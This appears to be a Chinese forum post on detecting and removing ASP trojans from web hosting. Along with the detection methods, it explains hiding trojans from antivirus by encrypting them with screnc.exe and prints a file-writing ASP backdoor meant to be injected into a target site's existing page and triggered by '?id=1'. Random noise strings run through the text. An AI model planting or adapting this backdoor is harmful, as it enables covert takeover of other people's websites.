TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
/ t4 m5 `) ]8 f( p6 j
7 W( Y7 l9 c: z8 `; e- _3 D! p通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 % o9 o. ^, p/ t Y, O1 C
6 V6 p( \' T* |
一.技巧1:杀毒软件查杀 6 b0 H# X M4 j" \+ `1 k. @, c* h' Z
9 ?+ p0 z6 [4 t4 U5 `) W) S$ r
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
6 t/ X! W0 n4 b- c$ o
! @/ p6 @3 l$ f7 I利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
" P3 Q; P; p- E# v' o% B
; r) A6 y7 H) M+ N$ ]二.技巧2:FTP客户端对比 8 d0 M6 h( s' ^3 I' {! V
7 V& S0 {; @4 F+ u: h
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: ; Y; v* {6 A' }0 W* C
$ \. o7 K0 J {9 Y* E4 b: k0 H B: K
screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。
" K; G$ S6 U* V! e" T3 W" ~) [6 Z* n6 x4 t4 w/ Q3 c
经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 X# J% c% M3 }% n7 a M; e
3 q) @$ }: o. s# k7 _
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 9 h; }. C( Z4 m9 u, ~
0 w' S7 H* E- z7 n* f
盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 7 J% {6 T% ?7 ^
6 \! e2 C9 v0 ?7 v3 P所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 + U* V9 c$ g) G/ ?8 Z' L
% J- `. S" u5 P! F q4 Z' D这里以FlashFXP进行操作讲解。
9 D; j5 J: J3 G( `: ~% Y
5 o/ E% m5 l A% C0 X) o( _! | d步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。 9 [& Q" U3 \# T7 _7 i3 d
7 k2 x1 e* M( T% ^' y步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 5 V2 E* k& ^ D
5 C `7 j4 z) g8 p, K我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
/ [8 v; V6 ~- z, b' X x三.技巧3:用Beyond Compare 2进行对比 . R+ {+ u Z4 t) y6 r
- h6 K9 y7 q# X# A- `上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
& B1 c% L5 A. x9 }& t. X q4 p4 D; S$ w2 E' c( a8 I- P
〈%
3 L4 `2 U( I4 f' Z" H6 i+ y
( o9 Z' V9 H3 B: b# Q; B" [on error resume next
3 y' u% a. A+ ^; Z
7 R9 P0 M2 i- e0 j N/ Uid=request("id")
2 n, p' y" |2 c$ ~4 x8 W6 ]" m
/ l& I$ c' n/ w! T6 e0 P# c2 y3 J- Kif request("id")=1 then , ~3 C! _( B* S
& ~' Y9 o& p" j: m+ K3 T4 ?9 L5 w# btestfile=Request.form("name")
0 r+ c$ x. @& F5 I( p+ m
3 ^) L0 Z. I: _. z- s7 g' hmsg=Request.form("message") 0 l/ C* d# Z" m* w% _. M
/ s. X; S5 v# g6 ? C T; I! J: @4 yset fs=server.CreatObject("scripting.filesystemobject") 1 x' a6 q# g! u$ U% L
6 G2 h/ h" y9 Q7 k/ H" `; x: U: Vset thisfile=fs.openTestFile(testfile,8,True,0) 3 Q4 R' \1 Z* L: Z) p8 D# b* z
) w! _8 {0 O/ c* i4 cthisfile.Writeline(""&msg&"") 6 Z9 \( E; X- W! U. r
+ l8 o7 `/ Q+ _) t2 l5 Ythisfile.close 5 J' u4 O2 _ J0 U
# p; `7 ]2 F3 T$ e0 G. x6 ^8 T3 ]set fs=nothing
4 F; `) M% Q& E. B" f9 [* N. j% {% J. p% V1 ?) H" F+ B" r% T
%〉 ) [) B$ U& W- E0 b
5 ^8 F% A8 \% X: H5 i+ N E
〈from method="post" Action="保存"?id=1〉 % T' y0 x' T1 W! C
$ k# B: a9 T' r8 x3 h5 { ^$ g! a
〈input type="text" size="20" name="Name" - z+ Q/ ?* w1 \6 j0 t9 ^! E; s$ F! {
9 }0 P$ p( \, Z( m0 P8 kValue=〈%=server.mappath("XP.ASP")%〉〉 2 m. C( A3 R# j/ p& D7 y5 W: w
) [( S/ j# N% V- }+ D
〈textarea name="Message" class=input〉
" z: ~0 T* h/ t; |" d1 g" n' k/ C% `, ]: j5 C
: S0 I0 V4 \% l9 O
〈/textarea〉
5 g& K. h. {. C3 W5 k
/ Q2 g/ H" ]1 ?- l% m6 e' m〈input type="Submit" name="send" Value="生成"
' v2 x$ m; z4 T1 }) {) m+ s' K1 i6 @( }+ k+ {$ {: T
class=input〉 4 Z5 D7 Z5 P: j
! b/ c: P9 @* l7 O
〈/from〉 ; }4 b+ A2 O4 z- J! z4 _9 W
4 N- z6 C+ D+ D' ?" H. [〈%end if%〉
5 \1 `+ }( ]3 u$ e4 @
e( Q2 Y0 ~* f8 q+ b0 Q: L) A注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
$ G: |/ x* q3 W+ H# f
! z2 R, ^1 ~* }3 \$ E6 Z) |假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
! f( v- ]$ b! j* @0 v" u4 w& a) ]9 I! B: n4 Y
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 $ ]9 O( _2 H' P& U
4 B& t! b2 L9 H+ tBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。* e, b, X0 Y5 i- c6 l
: x2 _. ]7 q& O( E. a看我来利用它完成渗透性asp木马的查找。 - g% P/ k6 M0 }/ ^: m
0 A$ ?. ?! ?, F
步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
! _7 n$ ^& h) \ s* J; r7 X/ @( w
步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
) E. b* K/ I+ c5 x; i, q5 l
6 F" V/ M6 }- @* b/ o步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! % Q% `3 i' `4 _+ A$ Y: R
7 b& t* h$ i$ h; @& f3 \" T( q& [. {6 V' g1 v, X y# G% ?, Y& c
四.技巧4:利用组件性能找asp木马 : O/ `9 V' ?) y( j$ q! u' N
; d5 I7 ?4 N& x4 d/ Q4 |1 j上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。 n9 K/ B$ @, Y# k2 `3 ]
0 i# a" o T& V3 d8 b
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 % W- o$ c7 Y* ~
/ J' k5 j$ e9 h它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 " }- ^4 X2 i5 ?3 q/ W
1 b$ o2 L7 V+ d* |9 d/ E使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
8 S a; d U, T- s
# d: [- {4 c8 _8 s( j1 F一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 , n1 W( |2 T1 {7 p
c* l6 } J3 E x+ f1 Y大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主